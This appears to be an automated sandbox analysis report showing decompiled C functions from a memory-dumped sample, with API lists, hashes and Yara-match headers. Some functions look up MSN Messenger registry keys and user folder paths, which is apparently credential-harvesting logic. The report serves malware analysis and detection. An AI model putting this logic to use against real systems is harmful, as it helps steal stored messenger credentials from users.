                                                                                                                                                                  0x0040a795
                                                                                                                                                                  0x0040a7a7

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                                                                  • Opcode ID: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                  • Instruction ID: d235f9a75b77abe912022d820ae93ced97f95949ab3107a8ace45c524b087071
                                                                                                                                                                  • Opcode Fuzzy Hash: b62834dc514b00cfd30f714a9fad692c6252d4fd7e33ed5c13f61842356538e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5421C170704602EFC719EF75C884A95B7A9FF48314B10413EF529A7291DB39AC218B8A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F4CA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                  			E0040F4CA(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040F41D();
				if( *0x41851c == 0 ||  *((intOrPtr*)(E00406282() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040F1B0() == 0) {
						E0040F44C(_t38);
						E0040F1F1(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41851c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                                                                                                                  0x0040f4ca
                                                                                                                                                                  0x0040f4ca
                                                                                                                                                                  0x0040f4d4
                                                                                                                                                                  0x0040f4e1
                                                                                                                                                                  0x0040f519
                                                                                                                                                                  0x0040f51f
                                                                                                                                                                  0x0040f52a
                                                                                                                                                                  0x0040f539
                                                                                                                                                                  0x0040f53a
                                                                                                                                                                  0x0040f53f
                                                                                                                                                                  0x0040f546
                                                                                                                                                                  0x0040f549
                                                                                                                                                                  0x0040f54a
                                                                                                                                                                  0x0040f54f
                                                                                                                                                                  0x0040f54f
                                                                                                                                                                  0x0040f55e
                                                                                                                                                                  0x0040f565
                                                                                                                                                                  0x0040f57d
                                                                                                                                                                  0x0040f588
                                                                                                                                                                  0x0040f588
                                                                                                                                                                  0x0040f596
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f4fd
                                                                                                                                                                  0x0040f501
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f501

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76D24DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                    • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                  • memset.MSVCRT ref: 0040F51F
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                  • API String ID: 181880968-2036018995
                                                                                                                                                                  • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                  • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                                                                                                                                                                  • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                  • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403946, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403946(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x413eb0;
				E004046E1( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040DC39( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040DB04( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038A9(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047FB( &_v528);
			}


















                                                                                                                                                                  0x00403946
                                                                                                                                                                  0x0040395c
                                                                                                                                                                  0x00403967
                                                                                                                                                                  0x00403972
                                                                                                                                                                  0x00403974
                                                                                                                                                                  0x00403978
                                                                                                                                                                  0x0040397f
                                                                                                                                                                  0x00403988
                                                                                                                                                                  0x0040398c
                                                                                                                                                                  0x004039b9
                                                                                                                                                                  0x004039be
                                                                                                                                                                  0x004039e1
                                                                                                                                                                  0x004039c0
                                                                                                                                                                  0x004039d1
                                                                                                                                                                  0x004039d3
                                                                                                                                                                  0x004039d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004039d7
                                                                                                                                                                  0x004039d7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004039d7
                                                                                                                                                                  0x004039d5
                                                                                                                                                                  0x0040398e
                                                                                                                                                                  0x0040399f
                                                                                                                                                                  0x004039a3
                                                                                                                                                                  0x004039b5
                                                                                                                                                                  0x004039b5
                                                                                                                                                                  0x004039a5
                                                                                                                                                                  0x004039a5
                                                                                                                                                                  0x004039a9
                                                                                                                                                                  0x004039ae
                                                                                                                                                                  0x004039ae
                                                                                                                                                                  0x004039a3
                                                                                                                                                                  0x004039e6
                                                                                                                                                                  0x004039ea
                                                                                                                                                                  0x004039f4
                                                                                                                                                                  0x004039f4
                                                                                                                                                                  0x004039f9
                                                                                                                                                                  0x004039fd
                                                                                                                                                                  0x00403a16

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
                                                                                                                                                                    • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                                                                                                                                                                    • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
                                                                                                                                                                    • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
                                                                                                                                                                    • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\MessengerService, xrefs: 004039CB
                                                                                                                                                                  • Software\Microsoft\MSNMessenger, xrefs: 00403999
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                  • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                                                                                                  • API String ID: 1910562259-1741179510
                                                                                                                                                                  • Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                                                                                                                                                                  • Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
                                                                                                                                                                  • Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                                                                                                                                                                  • Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F37C, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040F37C(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x418110 =  *0x418110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                                                                                                                  0x0040f389
                                                                                                                                                                  0x0040f38f
                                                                                                                                                                  0x0040f393
                                                                                                                                                                  0x0040f3a0
                                                                                                                                                                  0x0040f3a4
                                                                                                                                                                  0x0040f3aa
                                                                                                                                                                  0x0040f3b2
                                                                                                                                                                  0x0040f3b5
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3c1
                                                                                                                                                                  0x0040f3c4
                                                                                                                                                                  0x0040f3c7
                                                                                                                                                                  0x0040f3c9
                                                                                                                                                                  0x0040f3c9
                                                                                                                                                                  0x0040f3cd
                                                                                                                                                                  0x0040f3d0
                                                                                                                                                                  0x0040f3e0
                                                                                                                                                                  0x0040f3e2
                                                                                                                                                                  0x0040f3e6
                                                                                                                                                                  0x0040f3e6
                                                                                                                                                                  0x0040f3ea
                                                                                                                                                                  0x0040f3f4
                                                                                                                                                                  0x0040f3f4
                                                                                                                                                                  0x0040f3bd
                                                                                                                                                                  0x0040f3b2
                                                                                                                                                                  0x0040f3f9
                                                                                                                                                                  0x0040f3ff

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 0040F389
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040F3B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                  • Opcode ID: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                                                                                                                                                                  • Instruction ID: 02aaebfec467b3bf7519b160cf801d0b857f87d6ebd9b35fbb0925b6dc32657f
                                                                                                                                                                  • Opcode Fuzzy Hash: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                                                                                                                                                                  • Instruction Fuzzy Hash: B601D6327002156BCB294FA5DC45A9BBFAEFF857A1704803AFC09E72A1DB70C905D6C8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F0E3, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                  			E0040F0E3(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E00412360(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x41344f,  &_v8200, 0x2000, _a20); // executed
					_t23 = E0040680B( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406792(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                                                                                                                  0x0040f0eb
                                                                                                                                                                  0x0040f0f6
                                                                                                                                                                  0x0040f0fc
                                                                                                                                                                  0x0040f146
                                                                                                                                                                  0x0040f164
                                                                                                                                                                  0x0040f174
                                                                                                                                                                  0x0040f0fe
                                                                                                                                                                  0x0040f10b
                                                                                                                                                                  0x0040f112
                                                                                                                                                                  0x0040f11b
                                                                                                                                                                  0x0040f12f
                                                                                                                                                                  0x0040f12f
                                                                                                                                                                  0x0040f17e

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040F10B
                                                                                                                                                                    • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
                                                                                                                                                                    • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
                                                                                                                                                                  • memset.MSVCRT ref: 0040F146
                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3143880245-0
                                                                                                                                                                  • Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                  • Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                  • Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004123F2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E004123F2() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x418528;
				if(_t1 != 0) {
					_push(_t1);
					L00412096();
				}
				_t2 =  *0x418530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L00412096(); // executed
				}
				_t3 =  *0x41852c;
				if(_t3 != 0) {
					_push(_t3);
					L00412096();
				}
				_t4 =  *0x418534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L00412096(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                                                                                                  0x004123f2
                                                                                                                                                                  0x004123f9
                                                                                                                                                                  0x004123fb
                                                                                                                                                                  0x004123fc
                                                                                                                                                                  0x00412401
                                                                                                                                                                  0x00412402
                                                                                                                                                                  0x00412409
                                                                                                                                                                  0x0041240b
                                                                                                                                                                  0x0041240c
                                                                                                                                                                  0x00412411
                                                                                                                                                                  0x00412412
                                                                                                                                                                  0x00412419
                                                                                                                                                                  0x0041241b
                                                                                                                                                                  0x0041241c
                                                                                                                                                                  0x00412421
                                                                                                                                                                  0x00412422
                                                                                                                                                                  0x00412429
                                                                                                                                                                  0x0041242b
                                                                                                                                                                  0x0041242c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412431
                                                                                                                                                                  0x00412432

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
                                                                                                                                                                  • Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
                                                                                                                                                                  • Opcode Fuzzy Hash: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004079E7, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E004079E7() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x418540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x418540 = 0x8000;
					 *0x418544 = 0x100;
					 *0x418548 = 0x1000; // executed
					L00412090(); // executed
					 *0x418528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x418544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L00412090();
					 *0x418530 = _t16;
					_t29 = 4;
					_t18 =  *0x418544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L00412090();
					_push( *0x418548);
					 *0x418534 = _t18; // executed
					L00412090(); // executed
					 *0x41852c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                                                                                                                  0x004079e7
                                                                                                                                                                  0x004079ee
                                                                                                                                                                  0x004079f5
                                                                                                                                                                  0x004079f6
                                                                                                                                                                  0x004079fb
                                                                                                                                                                  0x00407a05
                                                                                                                                                                  0x00407a0f
                                                                                                                                                                  0x00407a14
                                                                                                                                                                  0x00407a22
                                                                                                                                                                  0x00407a23
                                                                                                                                                                  0x00407a2c
                                                                                                                                                                  0x00407a2d
                                                                                                                                                                  0x00407a32
                                                                                                                                                                  0x00407a40
                                                                                                                                                                  0x00407a41
                                                                                                                                                                  0x00407a4a
                                                                                                                                                                  0x00407a4b
                                                                                                                                                                  0x00407a50
                                                                                                                                                                  0x00407a56
                                                                                                                                                                  0x00407a5b
                                                                                                                                                                  0x00407a63
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407a63
                                                                                                                                                                  0x00407a68

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                  • Opcode ID: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
                                                                                                                                                                  • Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406104, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00406104(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00406105
                                                                                                                                                                  0x00406109
                                                                                                                                                                  0x00406154
                                                                                                                                                                  0x0040610b
                                                                                                                                                                  0x0040610c
                                                                                                                                                                  0x0040610e
                                                                                                                                                                  0x00406112
                                                                                                                                                                  0x00406114
                                                                                                                                                                  0x00406116
                                                                                                                                                                  0x00406120
                                                                                                                                                                  0x00406128
                                                                                                                                                                  0x0040612a
                                                                                                                                                                  0x0040612e
                                                                                                                                                                  0x00406138
                                                                                                                                                                  0x0040613d
                                                                                                                                                                  0x00406141
                                                                                                                                                                  0x00406146
                                                                                                                                                                  0x00406150
                                                                                                                                                                  0x00406150

                                                                                                                                                                  APIs
                                                                                                                                                                  • malloc.MSVCRT ref: 00406120
                                                                                                                                                                  • memcpy.MSVCRT ref: 00406138
                                                                                                                                                                  • free.MSVCRT(00000000,00000000,76D24DE0,00406B78,00000001,?,00000000,76D24DE0,00406EF2,00000000,?,?), ref: 00406141
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                  • Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                  • Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                  • Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BAB7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E0040BAB7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E00402393( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E4A(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x41344f;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L00412072();
				if(_t24 != 0) {
					_t52 = E0040BA21(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040B031(_t49, _t38); // executed
					E0040A6C6(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x41344f;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409C9C( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B1DC(_t49);
					L15:
					return _t38;
				}
			}












                                                                                                                                                                  0x0040bab7
                                                                                                                                                                  0x0040bab7
                                                                                                                                                                  0x0040bac0
                                                                                                                                                                  0x0040bac4
                                                                                                                                                                  0x0040bad5
                                                                                                                                                                  0x0040badb
                                                                                                                                                                  0x0040bae0
                                                                                                                                                                  0x0040bae9
                                                                                                                                                                  0x0040bb00
                                                                                                                                                                  0x0040baeb
                                                                                                                                                                  0x0040baee
                                                                                                                                                                  0x0040bafa
                                                                                                                                                                  0x0040bafa
                                                                                                                                                                  0x0040baf0
                                                                                                                                                                  0x0040baf5
                                                                                                                                                                  0x0040baf5
                                                                                                                                                                  0x0040bafc
                                                                                                                                                                  0x0040bafc
                                                                                                                                                                  0x0040bb05
                                                                                                                                                                  0x0040bb06
                                                                                                                                                                  0x0040bb0b
                                                                                                                                                                  0x0040bb14
                                                                                                                                                                  0x0040bb20
                                                                                                                                                                  0x0040bb22
                                                                                                                                                                  0x0040bb24
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bb16
                                                                                                                                                                  0x0040bb18
                                                                                                                                                                  0x0040bb26
